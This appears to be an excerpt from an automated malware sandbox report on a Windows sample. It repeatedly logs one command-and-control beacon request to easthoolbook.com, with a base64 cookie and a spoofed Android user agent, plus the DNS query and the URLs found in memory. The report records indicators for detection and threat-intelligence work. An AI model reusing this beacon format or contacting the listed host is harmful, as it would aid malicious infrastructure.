Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: easthoolbook.com

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3218783983.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151112670.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3188931002.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245218172.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.00000000004A2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2092109726.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181153623.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3051105235.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/8j
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/Gs
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/Tj
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/bq
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/ign.mpeg?dare=true
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2841533366.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/nr
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/o
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://easthoolbook.com/r
